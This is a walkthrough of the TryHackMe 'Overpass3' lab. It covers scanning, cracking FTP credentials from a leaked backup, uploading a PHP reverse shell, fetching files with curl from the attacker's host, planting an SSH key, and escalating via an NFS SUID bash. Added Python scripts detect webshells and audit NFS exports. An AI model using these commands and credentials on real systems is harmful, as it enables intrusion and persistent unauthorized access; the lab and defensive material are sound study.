TryHackMe - Overpass3

Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.4.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 17:50 EDT
Stats: 0:04:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.32% done; ETC: 17:55 (0:00:20 remaining)
Nmap scan report for 10.10.4.129
Host is up (0.21s latency).
Not shown: 65235 filtered tcp ports (no-response), 297 filtered tcp ports (admin-prohibited)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
|   256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_  256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
|_http-title: Overpass Hosting
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 5.4 (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 317.52 seconds
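Turning the scan above into something a defender can act on, as an added example (not part of the original write-up): a small parser for nmap's normal output that extracts each open port with its version string and NSE script lines, then produces triage notes. The sample input is the port section of the scan above; the note texts and the choice of which services to flag are my own.

```python
import re
from dataclasses import dataclass, field

# Sample input: the port section of the nmap scan above, embedded so the
# script runs offline.
NMAP_OUTPUT = """\
Nmap scan report for 10.10.4.129
Host is up (0.21s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
|   256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_  256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
|_http-title: Overpass Hosting
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
Service Info: OS: Unix
"""

# One port line: "<port>/<proto> <state> <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE output lines ("|" lines)


def parse_nmap(text):
    """Parse nmap normal output into Port records; script lines attach to the
    port line that precedes them."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), m.group(5).strip()))
        elif line.startswith("|") and ports:
            # strip the "| " / "|_  " prefix nmap puts on script output
            ports[-1].scripts.append(line.lstrip("|_ ").rstrip())
    return ports


def findings(ports):
    """Triage notes for the open services; the rules are my own, not nmap's."""
    notes = []
    for p in ports:
        if p.state != "open":
            continue
        if p.service == "ftp":
            notes.append(f"{p.number}/{p.proto}: FTP exposed; credentials "
                         "cross the network in cleartext")
        if p.service == "http" and any("TRACE" in s for s in p.scripts):
            notes.append(f"{p.number}/{p.proto}: HTTP TRACE enabled "
                         "(Apache: set 'TraceEnable off')")
    return notes


if __name__ == "__main__":
    for note in findings(parse_nmap(NMAP_OUTPUT)):
        print(note)
```

`TraceEnable off` is a real Apache directive; the rest of the findings logic is a starting point to extend with whatever services matter in your environment.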

Gobuster

If we go to the website, there is nothing specific visible, so we can run gobuster to check for hidden directories.

There is a backups page, and in it we find a backup.zip file. The zip is easily extracted (it is not password protected). In it we find:

  • A PGP private key

  • An Excel file, CustomerDetails.xlsx.gpg

Decrypt the xlsx

  • According to this doc it can be decrypted in one command, but first we need to import the private key with gpg --import priv.key

  • And then we can decrypt the file:

  • Once decrypted, the file can be opened with LibreOffice (if, like me, you do not have Microsoft Excel ;) )

  • And we get this

So we have usernames and passwords:

  • paradox ShibesAreGreat123

  • 0day OllieIsTheBestDog

  • muirlandoracle A11D0gsAreAw3s0me

We can put the usernames and the passwords in separate files for later use.

FTP

  • Let's see if we can use those to connect through FTP. (Note: I tried with SSH, but password authentication is not supported.)

  • Using Hydra we have a hit!

  • So we can connect to the FTP server using the creds paradox:ShibesAreGreat123

  • It seems like this FTP directory is the one used to serve the website. We have write permission, so we can try to get RCE this way.

  • As it is Apache, we can try to use a PHP reverse shell. Let's take the one from pentestmonkey.

  • We modify the IP address and port as we wish.

  • We set up our listener: rlwrap nc -lvp 1234 (rlwrap gives us a more interactive shell, which is pretty convenient)

  • We put our reverse shell on the FTP server.

  • And now we can navigate to our shell using our browser http://10.10.4.129/php-reverse-shell.php

  • We get a shell!!

  • Let's use the find command to look for a flag: find / -name '*flag*' 2>/dev/null. There is one here: /usr/share/httpd/web.flag

  • We have the web flag
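The shell above worked because the FTP account could write into the directory Apache serves, and Apache happily executed the uploaded PHP. The detection side of that, as an added example (not code from the write-up): a scanner that reads a document root and flags PHP files combining the primitives a reverse shell needs (a socket plus a spawned process). The indicator lists, the two-category threshold and the sample document root are my own constructions.

```python
import os
import re

# Indicator patterns: PHP primitives a reverse shell needs to open a socket or
# spawn a process, plus common obfuscation helpers. A hit is a lead to
# inspect, not proof.
INDICATORS = {
    "socket": re.compile(r"\b(fsockopen|stream_socket_client)\s*\("),
    "process": re.compile(r"\b(proc_open|popen|shell_exec|passthru|system|exec)\s*\("),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\("),
}


def classify(content):
    """Return the set of indicator categories present in one PHP source."""
    return {name for name, rx in INDICATORS.items() if rx.search(content)}


def scan_webroot(files, min_categories=2):
    """files: mapping of path -> file content (str).
    Flags PHP files showing at least `min_categories` distinct categories, so
    a lone base64_decode in a legitimate app does not clutter the report."""
    report = []
    for path, content in sorted(files.items()):
        if not path.endswith((".php", ".phtml", ".phar")):
            continue
        cats = classify(content)
        if len(cats) >= min_categories:
            report.append((path, sorted(cats)))
    return report


def load_webroot(root):
    """Read a real document root into the mapping scan_webroot expects."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    files[path] = fh.read()
            except OSError:
                continue
    return files


# Constructed sample document root (not files taken from the box): a benign
# page, a page that only decodes a token, and an uploaded shell skeleton.
SAMPLE_WEBROOT = {
    "/var/www/html/index.php": "<?php echo 'Overpass Hosting'; ?>",
    "/var/www/html/contact.php": "<?php $ok = base64_decode($_POST['token'] ?? ''); ?>",
    "/var/www/html/uploads/shell.php": (
        "<?php $sock = fsockopen($ip, $port, $errno, $errstr, 30);\n"
        "$process = proc_open('sh', $descriptorspec, $pipes); ?>"
    ),
}


if __name__ == "__main__":
    for path, cats in scan_webroot(SAMPLE_WEBROOT):
        print(f"{path}: {', '.join(cats)}")
```

The structural fix is to keep the FTP upload root outside the Apache DocumentRoot, or to turn script execution off for any directory users can write to (for mod_php, `php_admin_flag engine off` inside that `<Directory>` block); the scanner is the compensating check for when that separation has been lost.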

  • We could try the passwords we got previously with the su command.

  • Let's try with james: all three passwords fail. Let's try with paradox: it works with the password ShibesAreGreat123

  • If we ls -al the home directory, there is an authorized_keys file for paradox, so we could replace it with our public key to have a more stable shell. Let's generate an RSA key pair.

  • Now we just need to replace the authorized_keys file with our public key. First we copy our public key (private.pub) into an authorized_keys file: cp private.pub authorized_keys

  • Then we launch an HTTP server: python3 -m http.server 80

  • wget does not work on our target, so we can use curl instead: curl http://10.13.22.56/authorized_keys --output authorized_keys

  • And now authorized_keys contains our public key.

  • Now we can just connect this way: ssh -i private paradox@10.10.4.129

  • Let's get linpeas on the machine to enumerate our way to root.

  • We get linpeas on our machine: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64

  • We launch a Python HTTP server: python3 -m http.server 80

  • We get it on our target using curl: curl http://10.13.22.56/linpeas_linux_amd64 --output linpeas

  • We make it executable: chmod +x linpeas

  • We launch it: ./linpeas

  • There is a recent CVE: CVE-2021-4034

  • But there is also this, which seems interesting, as linpeas highlights it as a 95% PE vector

  • We could try to port forward with ssh paradox@10.10.4.129 -i private -L 2049:localhost:2049 and then mount the share.

  • We now have access to the user flag, and we also have the .ssh folder of james, so we can use it to log in as james.

  • It works

  • Let's try to go further with the NFS misconfiguration.

  • For our attacking machine we run

  • From our shell as james we can now run

  • So we get this error; we probably need another bash binary. Let's try with the one from the target machine.

  • We copy it to our attacking machine using scp: scp -i .ssh/id_rsa james@10.10.4.129:/bin/bash .

  • Let's redo our chmod +s: chmod +s bash

  • We just need to run ./bash -p and it works!

(In fact, I accidentally typed ./bash at first, but then retyping ./bash -p did the trick.)

  • We can get the root flag: bash-4.4# cat /root/root.flag
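The escalation above rests on two conditions: the NFS export allowed a client's root to write root-owned files (no_root_squash), and nothing on the host objected to a root-owned SUID bash sitting in a home directory. An added example (my own code, not part of the write-up) that audits both: a parser for /etc/exports that reports the dangerous options, and a check over (path, mode, uid) entries that flags root-owned SUID files outside the standard system directories. The sample exports text, the list of "standard" SUID locations and the finding texts are my own constructions.

```python
import os
import stat

# Where root-owned SUID binaries are expected; anything elsewhere is a lead.
STANDARD_SUID_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                      "/usr/lib/", "/usr/libexec/")

# Constructed sample /etc/exports (not the box's real file).
SAMPLE_EXPORTS = """\
/home/james *(rw,sync,no_root_squash)
/srv/data 10.0.0.0/24(ro,sync)   # read-only, squashed: fine
"""


def parse_exports(text):
    """Parse /etc/exports into (path, client, [options]) tuples.
    A path with no client spec is exported to everyone, so client becomes '*'."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:] or ["*"]
        for c in clients:
            if "(" in c:
                host, opts = c.rstrip(")").split("(", 1)
                options = [o.strip() for o in opts.split(",") if o.strip()]
            else:
                host, options = c, []
            entries.append((path, host or "*", options))
    return entries


def audit_exports(text):
    """Findings for the export options that let a remote root act as local root."""
    findings = []
    for path, host, opts in parse_exports(text):
        if "no_root_squash" in opts:
            findings.append(f"{path} -> {host}: no_root_squash lets a client's "
                            "root create root-owned (and SUID) files; use root_squash")
        if host == "*":
            findings.append(f"{path} -> {host}: exported to any host; "
                            "restrict to specific addresses")
        if "insecure" in opts:
            findings.append(f"{path} -> {host}: 'insecure' accepts mounts "
                            "from unprivileged source ports")
    return findings


def suspicious_suid(entries):
    """entries: iterable of (path, st_mode, st_uid).
    Returns root-owned regular files with the SUID bit outside system dirs."""
    hits = []
    for path, mode, uid in entries:
        if (stat.S_ISREG(mode) and mode & stat.S_ISUID and uid == 0
                and not path.startswith(STANDARD_SUID_DIRS)):
            hits.append(path)
    return hits


def walk_suid(root="/"):
    """Yield (path, mode, uid) for every file under root, for suspicious_suid()."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            yield p, st.st_mode, st.st_uid


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f)
    for hit in suspicious_suid(walk_suid("/home")):
        print("root-owned SUID outside system dirs:", hit)
```

Run the first half against the real /etc/exports on any NFS server you own, and schedule the second half (e.g. over /home and /tmp) so a SUID copy of a shell appearing in a user directory shows up the same day rather than after someone has already typed ./bash -p.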
